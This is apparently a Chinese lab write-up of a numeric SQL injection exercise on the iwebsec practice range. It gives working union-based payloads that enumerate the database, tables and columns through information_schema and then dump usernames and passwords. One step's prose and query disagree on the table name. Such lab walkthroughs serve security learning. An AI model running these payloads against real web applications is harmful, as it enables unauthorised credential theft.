iwebsec-SQL数字型注入

1.判断是否存在漏洞

添加and 1=1发现正常显示,添加and 1=2无回显条目,则存在sql注入漏洞

2.因为有回显,尝试union联合注入,使用order by判断出有3个字段

3.使用union联合注入查看回显位,发现3三个字段均有回显,任意使用字段注入即可

4.获取数据库名

复制代码
?id=-1 union select database(),2,3

5.获取表名,这时候发现如果使用1和2回显位会显示报错,那么可以使用3回显位回显

复制代码
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜测用户可能存在user或users表中,先使用user表查看字段

复制代码
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

这里应该不是user表,真是用户存在users表,将表名改为users一样

复制代码
?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1
相关推荐
百川15 分钟前
sqli-labs靶场Less24
sql·web安全
老纪的技术唠嗑局31 分钟前
Agentic AI, 基于 Dify x OceanBase 的实践
数据库
冒泡的肥皂1 小时前
数据库最近学到的小知识(一
数据库·后端·架构
wuxuanok2 小时前
SQL理解——INNER JOIN
数据库·sql
天翼云开发者社区2 小时前
sql优化谓词下推在join场景中的应用
sql·关系数据库
GreatSQL2 小时前
工具分享-通过开源工具 tuning-primer快速巡检MySQL5.7
数据库
天天讯通2 小时前
机器人系统对接线索平台好处
大数据·数据库·人工智能·机器人·语音识别
枷锁—sha3 小时前
【BUUCTF系列】[HCTF 2018]WarmUp1
android·网络·web安全·网络安全
运维小杨4 小时前
Redis主从复制搭建
数据库·redis·缓存